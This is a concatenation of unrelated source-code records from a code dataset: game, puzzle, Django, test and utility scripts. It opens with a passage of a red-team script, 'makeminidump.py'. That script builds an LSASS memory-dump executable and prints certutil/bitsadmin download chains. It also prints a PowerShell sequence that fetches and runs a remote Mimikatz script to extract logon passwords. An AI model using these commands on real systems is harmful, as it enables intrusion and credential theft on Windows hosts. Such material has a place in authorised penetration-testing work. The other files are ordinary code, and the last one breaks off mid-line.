z.infolist()\n all_records = b\"\"\n for e in entries:\n cd_file_size = e.file_size\n cd_compress_size = e.compress_size\n cd_header_offset = e.header_offset\n cd_volume = e.volume\n\n # extra field used for zip64 files (files that are >4G in size\n # or contain fields/offsets that exceed 4G)\n extra = b\"\"\n\n if e.file_size > 0xFFFFFFFF:\n cd_file_size = 0xFFFFFFFF\n extra += struct.pack(\"<Q\", e.file_size)\n if e.compress_size > 0xFFFFFFFF:\n cd_compress_size = 0xFFFFFFFF\n extra += struct.pack(\"<Q\", e.compress_size)\n if e.header_offset > 0xFFFFFFFF:\n extra += struct.pack(\"<Q\", e.header_offset)\n if e.volume > 0xFFFF:\n cd_volume = 0xFFFF\n extra += struct.pack(\" nul && bitsadmin /complete %s && del %s && certutil -decode %s %s\"\n if proxy_steal == \"1\":\n certutilcombo_sub = \"bitsadmin /util /setieproxy networkservice AUTODETECT && \" + certutilcombo_sub\n\n certfilename = certutil_b64encode(runwebroot+exefilename)\n certfilepath_met = loadpath_met % randtxtname #certfilename\n certfilepath_cmd = loadpath_cmd % randtxtname #certfilename\n runfileroot = runwebroot + runfilename\n runfilepath_met = loadpath_met % randexename #runfilename\n runfilepath_cmd = loadpath_cmd % randexename #runfilename\n\n combo_one = certutilcombo % (lhost,certfilename,certfilepath_cmd,certfilepath_cmd,runfilepath_cmd)\n if custom_agent == \"0\":\n combo_one_sub = certutilcombo_sub % (bitsjobname,lhost,certfilename,certfilepath_cmd,runfilepath_cmd,certfilepath_cmd,runfilepath_cmd)\n if custom_agent == \"1\":\n combo_one_sub = certutilcombo_sub % (bitsjobname,bitsjobname,agent_string,bitsjobname,lhost,certfilename,certfilepath_cmd,bitsjobname,bitsjobname,runfilepath_cmd,certfilepath_cmd,runfilepath_cmd)\n combo_two = utilpath % (runfilepath_cmd) # no need to pass args\n combo_break = combo_one + \" && \" + combo_two\n combo_break_sub = combo_one_sub + \" && \" + combo_two\n\n copy(certfilename,runwebroot,certfilename)\n print('[*] upload:\\nupload %s %s' % (runfileroot,runfilepath_met)) \n print(combo_one)\n print(combo_one_sub)\n print('[*] check:\\ndir %s' % (runfilepath_cmd))\n print('[*] use (only with admin privileges!):\\n%s ' % (combo_two))\n print('[!] c-c-c-combo breaker (cmd only!) (only with admin privileges!) (sub):\\n%s' % combo_break_sub)\n \n return combo_break,combo_break_sub\n pass\n\ndef makeminidump(bitness,lhost):\n print('[!] 
warning! run only with admin priv!')\n minidumpfilename,dumpfilepath = writeminidump()\n dumpfilepath = dumpfilepath.replace('\\\\\\\\','\\\\')\n csfilepath = \"/home/kali/data/MiniDump/MiniDump/\"\n csfilename = \"Program.cs\"\n exewebroot = \"/var/www/html/\"\n exefilename = \"MiniDump.exe\"\n\n copy(minidumpfilename,csfilepath,csfilename)\n input(\"[!] build %s%s with bitness %s .. press enter to continue\\n\" % (csfilepath,csfilename,bitness))\n if bitness == \"64\":\n copy(\"%sbin/x64/Release/%s\" % (csfilepath,exefilename),exewebroot,exefilename)\n if bitness == \"32\":\n copy(\"%sbin/x86/Release/%s\" % (csfilepath,exefilename),exewebroot,exefilename)\n\n makecombo_minidump(lhost,exefilename)\n #print('[*] usage:\\n.\\\\MiniDump.exe')\n print('[!] check dump:\\ndir %s' % dumpfilepath)\n print('[!] dump lsass (on windows!):\\ndownload %s\\ncp lsass.dmp /var/www/html/\\nwget -uri http://%s/lsass.dmp -OutFile C:\\\\tools\\\\lsass.dmp\\niex(new-object net.webclient).downloadstring(\\'http://%s/kiwi.txt\\')\\nInvoke-Mimikatz -Command \"`\"sekurlsa::minidump c:\\\\tools\\\\lsass.dmp`\" sekurlsa::logonpasswords\" > c:\\\\tools\\\\dump.txt\\ntype c:\\\\tools\\\\dump.txt' % (dumpfilepath,devhost,devhost))\n\n pass\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--arch','-a',required=True,dest='arch',help='32 or 64')\n parser.add_argument('--lhost','-l',required=True,dest='host',help='lhost')\n args = parser.parse_args()\n \n bitness = args.arch\n lhost = args.host\n\n makeminidump(bitness,lhost)","repo_name":"6vr/Red-Team-Tips","sub_path":"make/makeminidump.py","file_name":"makeminidump.py","file_ext":"py","file_size_in_byte":7193,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"37187155729","text":"from story import *\n\nclass Map:\n\tdef __init__(self):\n\t\tself.map = [\n\t\t\t[Start(),\t\tSpider1(),Wasp2(), Knife(), \t\tNone\t\t],\n\t\t\t[None, \t\t\tChest1(),\tNone, \t\tSnake3(), Ant4()\t],\n\t\t\t[Key1(),\t\tNone, \t\tSpring(), Chest1(), Crow5()\t],\n\t\t\t[Beetle6(),\tNone, \t\tNone, \t\tNone, \t\tBrPlate()\t],\n\t\t\t[Axe(), \t\tNone, \t\tChest2(),\tPath2(), \tPath1()\t],\n\t\t\t[DoorS(), \tPath3(), \tSpring(), None, \t\tNone\t\t],\n\t\t\t[Ape7(),\t\tNone, \t\tNone, \t\tNone,\t\t\tNone\t\t],\n\t\t\t[Spring(),\tSpider8(),Spider1(),None, \t\tEnd()\t\t],\n\t\t]\n\t\n\tdef content_at(self, x, y):\n\t\treturn self.map[y][x]\n\t\n\tdef is_valid(self, x, y):\n\t\twidth = len(self.map[0])\n\t\theight = len(self.map)\n\t\treturn (0 <= x < width) and (0 <= y < height) and (self.map[y][x] != None)\n\t\n\tdef possible_directions_from(self, x, y):\n\t\tdirections = []\n\t\tif self.is_valid(x, y-1):\n\t\t\tdirections.append('north')\n\t\tif self.is_valid(x, y+1):\n\t\t\tdirections.append('south')\n\t\tif self.is_valid(x-1, y):\n\t\t\tdirections.append('west')\n\t\tif self.is_valid(x+1, y):\n\t\t\tdirections.append('east')\n\t\t\t\n\t\tcontent = self.content_at(x, y)\n\t\tif isinstance(content, Door) and not content.is_done:\n\t\t\tdirections.remove(content.direction)\n\t\t\t\n\t\treturn directions\n\t\n\tdef __str__(self):\n\t\treturn self.map_str()\n\t\n\tdef map_str(self, x=None, y=None, mode='explore'):\n\t\t'''\n\t\tThere are three modes:\n\t\t- 'explore': Default mode. Only shows what the player has already explored.\n\t\t- 'outline': Cheat. Same as 'explore', but shows all walls.\n\t\t- 'reveal': Cheat. 
Shows the whole map.\n '''\n map_str = '\\n'\n for i, row in enumerate(self.map):\n for j, content in enumerate(row):\n if not content:\n if self.has_explored_neighbors(j, i) or mode == 'outline' or mode == 'reveal':\n map_str += '####### '\n else:\n map_str += '??????? '\n else:\n display = type(content).__name__\n display = display + ((8-len(display))*' ')\n if i == y and j == x:\n display = 'YOU '\n elif not content.is_explored and not mode == 'reveal':\n display = '??????? '\n else:\n display = type(content).__name__\n display = display + ((8-len(display))*' ')\n map_str += display\n map_str += '\\n'\n return map_str\n \n def has_explored_neighbors(self, x, y):\n for i in range(y-1, y+2):\n for j in range(x-1, x+2):\n if self.is_valid(j, i):\n if self.map[i][j].is_explored:\n return True\n return False\n","repo_name":"lewisbar/Text-Adventure-2","sub_path":"map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"73736500307","text":"#!/home/apprenant/PycharmProject/Decorateur/venv/bin/python3.5\n\nimport sys\n\ntry:\n user = sys.argv[1]\nexcept IndexError as err:\n print(\"Error\")\n print(err)\n exit(1)\n\n# right[0] = simple users, right[1] = admins, right[2] = root\nright = (\n ['Michel', 'Marion'],\n ['Paul', 'Cassandre', 'Olivier'],\n ['Lucy']\n)\n\ndef right_to_int(level):\n # Map a right level name to its index in the `right` tuple.\n if level == 'user':\n return 0\n elif level == 'admin':\n return 1\n else:\n return 2\n\ndef user_level(name):\n # Highest right level the user belongs to, or -1 if unknown.\n for level, names in enumerate(right):\n if name in names:\n return level\n return -1\n\ndef echo(message):\n print(message)\n\ndef show_error():\n echo(\"error page\")\n\ndef auth_decorator(level):\n # Only run the decorated page if `user` has at least `level` rights.\n def fdecorator(func_display_page):\n def fdecorate(*args, **kwargs):\n if user_level(user) >= right_to_int(level):\n return func_display_page(*args, **kwargs)\n return show_error()\n return fdecorate\n return fdecorator\n\n@auth_decorator(\"user\")\ndef say_hello():\n echo(\"Hello\")\n\n@auth_decorator(\"admin\")\ndef show_page():\n echo(\"pages\")\n\n@auth_decorator('root')\ndef show_root():\n echo(\"root\")\n\n\n\n\"\"\"\ndef auth(func_display_page, user):\n print(\"Entering fdecorator\")\n print(func_display_page)\n\n def fdecorate(user):\n print('Entering fdecorate')\n return func_display_page(user)\n\n print(\"outgoing auth\")\n return fdecorate\n\n\n\ndef display_page(page):\n print(\"Entering display_page\")\n print(page)\n\n\ndisplay_page('OK')\n\"\"\"\n","repo_name":"lucyjosef/Decorator_python","sub_path":"Auth_decorator.py","file_name":"Auth_decorator.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"4952336831","text":"# a recursive function that computes and returns the number of digits in given input non-negative integer.\n\ndef count_digits(n):\n '''(int)->int\n Returns the number of digits in n\n Precondition: n a non-negative integer\n '''\n count=0\n rest_of_digits = n // 10\n if rest_of_digits == 0:\n count= 1\n else:\n count = 1 + count_digits(rest_of_digits)\n \n return count\n\n\n# this is the same ... just has few less lines of code\n\ndef count_digits_v2(n):\n '''(int)->int\n Returns the number of digits in n\n Precondition: n a non-negative integer\n '''\n rest_of_digits = n // 10\n if rest_of_digits == 0:\n return 1\n else:\n return 1 + count_digits(rest_of_digits)\n","repo_name":"NicholasAllair/ITI1120","sub_path":"Labs/lab11-solutions/prog_ex2.py","file_name":"prog_ex2.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"31869878381","text":"from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"mylisting\", views.mylisting, name=\"mylisting\"),\n path(\"mybids\", views.mybids, name=\"mybids\"),\n path(\"listingview/\", views.listings, name=\"listingview\"),\n path(\"bid/\", views.bid, name=\"bid\"),\n]\n","repo_name":"sauravadhikary/nefolisell","sub_path":"auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20788081684","text":"from unittest import TestCase\nfrom clayrs.content_analyzer.ratings_manager.score_processor import NumberNormalizer\n\n\nclass TestNumberNormalizer(TestCase):\n def test_fit(self):\n scores = [1, 2, 5, 5, 3, 3.5, 3.6, 3.7, 3.8, 3.9, 4.0, 10]\n\n result = []\n for score in scores:\n converted = NumberNormalizer(scale=(1, 10)).fit(score)\n result.append(converted)\n\n expected = [-1.0, -0.77777777, -0.11111111, -0.11111111,\n -0.55555555, -0.44444444, -0.42222222, -0.39999999,\n -0.37777777, -0.35555555, -0.33333333, 1.0]\n\n for expected_score, result_score in zip(expected, result):\n self.assertAlmostEqual(expected_score, result_score)\n\n # Test with rounding at the fourth digit\n result_rounded = []\n for score in scores:\n converted_rounded = NumberNormalizer(scale=(1, 10), decimal_rounding=4).fit(score)\n result_rounded.append(converted_rounded)\n\n expected_rounded = [-1.0, -0.7778, -0.1111, -0.1111, -0.5556,\n -0.4444, -0.4222, -0.4, -0.3778, -0.3556,\n -0.3333, 1.0]\n\n for expected_score_rounded, result_score_rounded in zip(expected_rounded, result_rounded):\n self.assertAlmostEqual(expected_score_rounded, result_score_rounded)\n\n def test_error(self):\n\n # 2 numbers must be passed\n with self.assertRaises(ValueError):\n NumberNormalizer(scale=(1,))\n\n with self.assertRaises(ValueError):\n NumberNormalizer(scale=(1, 2, 3))\n","repo_name":"swapUniba/ClayRS","sub_path":"test/content_analyzer/ratings_manager/test_rating_processor.py","file_name":"test_rating_processor.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"48"} +{"seq_id":"13001863238","text":"import sys\nsys.stdin = open(\"D8_1634_input.txt\", \"r\")\n\ndef dfs(s, e):\n if visited[ord(s) - 97] == 1:\n return 0\n visited[ord(s) - 97] = 1\n for i in alpha[ord(s) - 97]:\n if i == e:\n return 1\n else:\n if dfs(i, e):\n return 1\n return 0\n\n\nT = int(input())\nfor test_case in range(T):\n M, N = map(int, input().split())\n alpha = [[] for _ in range(26)]\n\n for _ in range(M):\n x, y = input().split()\n alpha[ord(x) - 97].append(y)\n\n print(\"#{}\".format(test_case + 1))\n for _ in range(N):\n a, b = input().split()\n if len(a) != len(b):\n print(\"no\")\n continue\n chk = 1\n for i in range(len(a)):\n visited = [0] * 26\n if a[i] != b[i]:\n if not dfs(a[i], b[i]):\n chk = 0\n break\n if chk:\n print(\"yes\")\n else:\n print(\"no\")","repo_name":"hongyong3/TIL","sub_path":"Algorithm/Swea/D8_1634.py","file_name":"D8_1634.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71728441106","text":"\ndef read_input(file_name):\n file = open(file_name, 'r')\n instructions = []\n for line in file:\n line = line.strip()\n inst 
= [x.strip() for x in line.split('=')]\n instructions.append(tuple(inst))\n return instructions\n\n\ndef apply_mask(mask, val):\n for i in range(len(mask)):\n if mask[i] == \"X\":\n continue\n else:\n val = val[:i] + mask[i] + val[i+1:]\n return val\n\n\ndef apply_mem_mask(mask, mem_adr):\n floaters = []\n for i in range(len(mask)):\n if mask[i] == \"0\":\n continue\n elif mask[i] == \"1\":\n mem_adr = mem_adr[:i] + mask[i] + mem_adr[i+1:]\n else:\n floaters.append(i)\n floating_adrs = []\n for i in range(pow(2, len(floaters))):\n bin_val = bin(i)[2:]\n temp = mem_adr\n offset = 0\n for ind, f_ind in enumerate(floaters):\n if (len(floaters) - 1) - ind >= len(bin_val):\n temp = temp[:f_ind] + '0' + temp[f_ind + 1:]\n offset += 1\n else:\n temp = temp[:f_ind] + bin_val[ind - offset] + temp[f_ind + 1:]\n floating_adrs.append(temp)\n return floating_adrs\n\n\ndef part1(instructions):\n mask = \"\"\n mem = [\"\" for i in range(100000)]\n for inst in instructions:\n if inst[0] == \"mask\":\n mask = inst[1]\n else:\n mem_adr = int(inst[0][4:-1])\n val = format(int(inst[1]), '#038b')[2:]\n m_val = apply_mask(mask, val)\n mem[mem_adr] = m_val\n total = 0\n for val in mem:\n if val != \"\":\n total += int(val, 2)\n return total\n\n\ndef part2(instructions):\n mask = \"\"\n mem = {}\n for inst in instructions:\n if inst[0] == \"mask\":\n mask = inst[1]\n else:\n mem_adr = format(int(inst[0][4:-1]), '#038b')[2:]\n val = int(inst[1])\n mem_adrs = apply_mem_mask(mask, mem_adr)\n for adr in mem_adrs:\n mem[int(adr, 2)] = val\n total = 0\n for val in mem.values():\n if val != \"\":\n total += int(val)\n return total\n\n\ndef main():\n file_name = \"Part1Input.txt\"\n instructions = read_input(file_name)\n print(part1(instructions))\n print(part2(instructions))\n\nif __name__ == '__main__':\n main()\n","repo_name":"ZacharyRJohnson/Advent-of-Code","sub_path":"2020/Day14/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"17330490334","text":"# -*- coding: utf-8 -*-\nwhile True:\n    n = int(input())\n    lista = []\n    lista2 = 0\n    if n == 0:\n        break\n    else:\n        for i in range(n):\n            c, v = map(int,input().split())\n            for o in range(v):\n                lista.append(c)\n        for u in set(lista):\n            if lista.count(u)>=2:\n                lista2 += int(lista.count(u)//2)\n    print(int(lista2/2))\n","repo_name":"ThiagoCComelli/URI-Online-Judge","sub_path":"URI-py/1366.py","file_name":"1366.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"11025913123","text":"# Code that extracts the information for the classes below from the json files\n\nimport json\nimport os\n\nclasses = ['43기념관', '518민주묘지상징탑', '63빌딩', '83타워', '경주타워', \n '공산정', '광개토대왕동상', '광안대교', '국립과천과학관', '국립산악박물관', \n '국립세종도서관', '근대역사박물관', '김대중노벨평화상기념관', '남산��워', '롯데월드타워', \n '백남준아트센터', '부산타워', '송도G타워', '송도포스코타워', '여수세계박람회스카이타워', \n '영도대교', '율곡이이동상', '이순신장군동상', '인천대교', '첨성대', \n '풍남문', '하멜등대', '한빛탑', '해운대아이파크', '호미곶등대']\n\nLandmarks = dict()\n\nbase_path = \"../랜드마크\" # raw dataset directory where the jpg and json files are stored\nfor _class in classes:\n # find the json file and read its info\n class_path = os.path.join(base_path, _class)\n\n # grab any json file\n json_path = \"\"\n for _file in os.listdir(class_path):\n if _file[-4:] == \"json\":\n json_path = os.path.join(class_path, _file)\n break\n \n # build a dictionary for each class from the info in the json file \n tmp = dict()\n with open(json_path, \"r\") as j:\n info = json.load(j)\n tmp[\"name\"] = 
info['regions'][0]['tags'][5][9:]\n tmp[\"description\"] = info['regions'][0]['sem_ext'][0]['value']\n tmp[\"address\"] = info[\"regions\"][0]['sem_ext'][1]['value']\n tmp[\"related_term\"] = info[\"regions\"][0]['sem_ext'][2]['value']\n\n Landmarks[_class] = tmp\n\nwith open('../landmarks_info.json', 'w',\n encoding='utf-8') as make_file:\n json.dump(Landmarks, make_file, indent=\"\\t\", ensure_ascii=False)\n","repo_name":"ITHwang/APOKIA","sub_path":"Image_Recognition_Model/create_json.py","file_name":"create_json.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8365083481","text":"\"\"\" Vincenzo Passariello - Es1 - Lab04 \"\"\"\r\n\r\ndef tupleMod(t1, t2, n):\r\n lst = list(t1)\r\n lst2 = list(t2)\r\n if(n <= len(t1)):\r\n lst2.reverse()\r\n for i in range(0, len(lst2)):\r\n lst.insert(n, lst2[i])\r\n return(tuple(lst))\r\n else:\r\n for i in range(0, len(lst2)):\r\n lst.insert(n, lst2[i])\r\n return(tuple(lst))\r\n","repo_name":"vinniepassa/PythonLabMate20172018","sub_path":"Lab04/Es1.py","file_name":"Es1.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4253049810","text":"from .models import QuestionSurv\nimport docx\nfrom datetime import datetime\n\ndef add_answer(document, spisok):\n if (len(spisok) > 0) and (spisok[0] != ''):\n for element in spisok:\n document.add_paragraph(element, 'List Bullet 2')\n\ndef sent_to_file(data):\n sys = []\n part = []\n file_name = str(datetime.now()) + '.docx'\n document = docx.Document()\n document.add_heading('ДЕТАЛЬНЫЙ ОПРОСНЫЙ ЛИСТ', 0)\n for key in data.keys():\n query_bd = QuestionSurv.objects.get(id=key)\n if (query_bd.partition.type.id in sys) and (query_bd.partition.id in part):\n p = document.add_paragraph('','List Bullet')\n r = p.add_run(query_bd.question)\n r.bold = True\n add_answer(document, data[key])\n elif query_bd.partition.type.id in sys:\n document.add_paragraph(query_bd.partition.name, 'Intense Quote')\n p = document.add_paragraph('', 'List Bullet')\n r = p.add_run(query_bd.question)\n r.bold = True\n add_answer(document, data[key])\n part.append(query_bd.partition.id)\n else:\n document.add_heading(query_bd.partition.type.name, 1)\n document.add_paragraph(query_bd.partition.name, 'Intense Quote')\n p = document.add_paragraph('','List Bullet')\n r = p.add_run(query_bd.question)\n r.bold = True\n add_answer(document, data[key])\n sys.append(query_bd.partition.type.id)\n part.append(query_bd.partition.id)\n\n document.save('./media/surv/'+ file_name)\n return file_name","repo_name":"bolt41/ButlerCFG","sub_path":"butlersurv/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9619979162","text":"import sys\r\nimport subprocess\r\nimport json\r\nimport random as rand\r\n\r\n\r\ndef install_reqs():\r\n interpreter = sys.executable\r\n \r\n if interpreter is None:\r\n print(\"Fatal error: cannot find Python interpreter.\")\r\n sys.exit(1)\r\n \r\n print(\"Updating pip...\")\r\n succ = subprocess.call([interpreter, '-m', 'pip', 'install', '--upgrade', 'pip'])\r\n \r\n if succ == 0:\r\n print(\"\\nPip was successfully updated.\\n\")\r\n else:\r\n print(\"\\nAn error occured while updating pip. 
This shouldn't be a big problem.\\n\")\r\n \r\n print(\"Downloading requirements\")\r\n succ = subprocess.call([interpreter, '-m', 'pip', 'install', '--upgrade', '-r', 'requirements.txt'])\r\n \r\n if succ == 0:\r\n print(\"\\nRequirements successfully installed.\\n\")\r\n else:\r\n print(\"An error occured while installing the requirements.\"\r\n \"Double check that you installed everything correctly as per the instructions on the github and try again.\")\r\n sys.exit(1)\r\n\r\n\r\ndef create_settings():\r\n print(\"By default, the trigger word is 'Hey Tbot, ' (space included)\\n\"\r\n \"So, for example, you might say 'Hey Tbot, tell me a joke!'\\n\"\r\n \"You can change this to be anything, such as '!Tbot ' or 'Yo Tbot! ' or simply '! '\\n\"\r\n \"Leave it blank to use the default. You can make it case sensitive/insensitive later, \"\r\n \"and change the triggerword entirely as a bot command after setup.\\n\")\r\n \r\n confirm = 'N'\r\n while confirm in ['n', 'N']:\r\n wakeword = input(\"Please input a wakeword: \")\r\n if wakeword.strip() == '':\r\n wakeword = 'Hey Tbot, '\r\n \r\n case_sensitive = None\r\n while case_sensitive not in ['y', 'n', 'yes', 'no']:\r\n case_sensitive = input('Do you want this to be casesensitive? (Y/N): ').lower()\r\n \r\n if case_sensitive in ['y', 'yes']:\r\n case_sensitive = True\r\n else:\r\n case_sensitive = False\r\n \r\n print(f\"Wakeword: '{wakeword}'\\nCase Sensitive: {case_sensitive}\")\r\n print(f\"Do these commands look like what you want/are possible: \\n\")\r\n if case_sensitive:\r\n print(f\"\\t{wakeword}tell me a joke!\")\r\n print(f\"\\t{wakeword}what rhymes with lizard?\")\r\n print(\"\\nThe following commands would not be valid: \")\r\n \r\n if wakeword.lower() != wakeword:\r\n print(f\"\\t{wakeword.lower()}tell me a joke!\")\r\n if wakeword.title() != wakeword:\r\n print(f\"\\t{wakeword.title()}what rhymes with lizard?\")\r\n if wakeword.upper() != wakeword:\r\n print(f\"\\t{wakeword.upper()}what's a synonym for cool?\")\r\n else:\r\n print(f\"\\t{wakeword}what's up?\")\r\n print(f\"\\t{wakeword.lower()}tell me a joke!\")\r\n print(f\"\\t{''.join(rand.choice([char.upper(), char]) for char in wakeword.lower())}what rhymes with lizard?\")\r\n print(f\"\\t{wakeword.upper()}what's a synonym for cool?\")\r\n \r\n cont = None\r\n while cont not in ['y', 'n', 'yes', 'no']:\r\n cont = input(\"\\nLook good? (Y/N): \").lower()\r\n confirm = cont\r\n \r\n print(\"TBot has several auto-task functions, which will automatically send messages in various intervals.\\n\"\r\n \"For example, TBot has an emote report that will be sent every week and displays the popularity of \"\r\n \"various emotes.\\nPlease input a channel ID to designate as the 'default channel' for TBot to post in \"\r\n \"(either for auto-tasks or for large posts.\\n Input nothing and TBot will use the default channel on the \"\r\n \"server. 
To grab the channel ID, right click a channel in the discord client and click 'copy id.'\")\r\n default_channel = \".\"\r\n while not default_channel.isdigit():\r\n default_channel = input(\"Please input a valid (numerical) channel id: \").strip()\r\n if default_channel == '':\r\n break\r\n\r\n token = None\r\n while token is None and token != '':\r\n token = input(\"\\nAt the beginning of the setup instructions on github, you wrote down a token.\\n\"\r\n \"Please input that here: \")\r\n \r\n print(\"\\nSaving all settings to cogs/util/data/settings.txt\")\r\n \r\n with open('cogs/util/data/settings.txt', 'w') as f:\r\n settings = {'Wakeword': wakeword,\r\n 'CaseSensitive': case_sensitive,\r\n 'DefaultChannel': default_channel,\r\n 'Token': token}\r\n f.write(json.dumps(settings))\r\n\r\n\r\ndef fix_async():\r\n print('Fixing async issues in required libraries...\\n')\r\n from inspect import getsourcefile\r\n import chardet\r\n\r\n path = getsourcefile(chardet)\r\n path = path[:path.rfind('\\\\chardet\\\\')] + '\\\\discord\\\\compat.py'\r\n print('Fixing discord/compat')\r\n with open(path, 'r') as f:\r\n lines = f.readlines()\r\n lines[31] = \" create_task = getattr(asyncio, 'async')\\n\"\r\n with open(path, 'w') as f:\r\n f.write(''.join(line for line in lines))\r\n\r\n path = path[:path.rfind('\\\\discord\\\\')] + '\\\\websockets\\\\compatibility.py'\r\n print('Fixing websockets/compatibility')\r\n with open(path, 'r') as f:\r\n lines = f.readlines()\r\n lines[8] = \" asyncio_ensure_future = getattr(asyncio, 'async')\\n\"\r\n with open(path, 'w') as f:\r\n f.write(''.join(line for line in lines))\r\n\r\n path = path[:path.rfind('\\\\websockets\\\\')] + '\\\\aiohttp\\\\helpers.py'\r\n print('Fixing aiohttp/helpers')\r\n with open(path, 'r') as f:\r\n lines = f.readlines()\r\n lines[24] = \" ensure_future = getattr(asyncio, 'async')\\n\"\r\n with open(path, 'w') as f:\r\n f.write(''.join(line for line in lines))\r\n print('\\nFininished fixing compatibility.\\n')\r\n\r\n\r\ndef main():\r\n interpreter = sys.executable\r\n \r\n if interpreter is None:\r\n print(\"Fatal Error: Cannot find Python interpreter\")\r\n sys.exit(1)\r\n \r\n while True:\r\n try:\r\n succ = subprocess.call([interpreter, 'tbot.py'])\r\n\r\n except KeyboardInterrupt:\r\n succ = 0\r\n\r\n finally:\r\n break\r\n\r\n print(f\"TBot has exited with exit code: {succ}.\")\r\n \r\n\r\nif __name__ == '__main__':\r\n print('======TBot Setup======\\n' + '='*22, end='\\n\\n\\n')\r\n print('Note, running this script will reset any current TBot settings. \\n')\r\n cont = None\r\n while cont not in ['y', 'n', 'yes', 'no']:\r\n cont = input('Do you want to continue? (Y/N): ').lower()\r\n\r\n if cont in ['n', 'no']:\r\n sys.exit(0)\r\n\r\n if sys.version_info >= (3, 7):\r\n print(f\"Your current Python version ({str(sys.version_info.major)}.{str(sys.version_info.minor)}) \"\r\n f\"is not fully compatible. TBot still uses the old version of discord.py which uses 3.6.\\n\"\r\n \"This is okay, but you will have to make a few modifications to some of the required libraries \"\r\n \"for TBot to run. \\nThis script can do this automatically, or you may create a virtual \"\r\n \"environment with an older Python version.\", end='\\n\\n')\r\n edit = None\r\n while edit not in ['y', 'n', 'yes', 'no']:\r\n edit = input(\"Would you like to automatically edit the required libraries? 
(Y/N): \").lower()\r\n\r\n if edit in ['y', 'yes']:\r\n edit = True\r\n else:\r\n edit = False\r\n\r\n print('='*50 + '\\n' + '='*50)\r\n\r\n print(\"Installing requirements...\")\r\n install_reqs()\r\n input(\"Press any key to continue.\")\r\n print('='*50 + '\\n' + '='*50 + '\\n')\r\n\r\n if edit:\r\n fix_async()\r\n input(\"Press any key to continue.\")\r\n print('=' * 50 + '\\n' + '=' * 50 + '\\n')\r\n\r\n create_settings()\r\n input(\"Press any key to continue.\")\r\n print('='*50 + '\\n' + '='*50 + '\\n')\r\n \r\n cont = None\r\n while cont not in ['y', 'n', 'yes', 'no']:\r\n cont = input(\"TBot setup has been complete. Would you like to launch the bot? (Y/N): \").lower()\r\n \r\n if cont in ['n', 'no']:\r\n print(\"You can launch TBot by typing into the command prompt 'python tbot.py'\")\r\n sys.exit(0)\r\n \r\n else:\r\n print(\"Launching TBot!\")\r\n main()\r\n \r\n \r\n\r\n","repo_name":"trevor-pope/TBot","sub_path":"initial_setup.py","file_name":"initial_setup.py","file_ext":"py","file_size_in_byte":8260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"491235450","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom collections import Counter\n\n# code Python qui utilise la méthode d'indexation pour rechercher\n# Les mots les plus fréquemment répétés\n# dans une page web sans compter les balises HTML\n\n# Fonction pour extraire le texte de la page web en ignorant les balises HTML\ndef get_text(url):\n page = requests.get(url)\n soup = BeautifulSoup(page.content, 'html.parser')\n for script in soup([\"script\", \"style\"]):\n script.decompose()\n text = soup.get_text()\n text = re.sub(r'\\s+', ' ', text)\n return text\n\n# Fonction pour compter les mots les plus fréquents\ndef count_words(text, n):\n words = re.findall('\\w+', text.lower())\n return Counter(words).most_common(n)\n\n# URL de la page web à analyser\nurl = 'https://www.example.com'\n\n# Récupération du texte de la page web\ntext = get_text(url)\n\n# Comptage des mots les plus fréquents (10 dans cet exemple)\nn = 10\ntop_words = count_words(text, n)\n\n# Affichage des résultats\nprint('Les', n, 'mots les plus fréquents sur la page', url, 'sont:')\nfor word, count in top_words:\n print(word, ':', count)\n","repo_name":"LucienTriail/Search3","sub_path":"searchTryData.py","file_name":"searchTryData.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72631484627","text":"from werkzeug.utils import secure_filename\nfrom PIL import Image\nimport os\nimport hashlib\n\n\nALLOWED_EXTENSIONS = {\"txt\", \"pdf\", \"png\", \"jpg\", \"jpeg\", \"gif\"}\nUPLOAD_FOLDER = os.getcwd() + \"/app/api/static/img/siswa/foto/\"\n# foto_folder = os.getcwd() + '/app/static/img/siswa/photos/'\n\n# MAX_FILE_SIZE = 2000\n\n\ndef allowed_extension(filename):\n return \".\" in filename and filename.rsplit(\".\", 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\ndef get_secure_filename(filename):\n return str(secure_filename(filename))\n\n\ndef uploads(f, nama_user, kelas):\n if f and allowed_extension(f.filename):\n fileOrigin = f.filename.rsplit(\".\", 1)\n fileExt 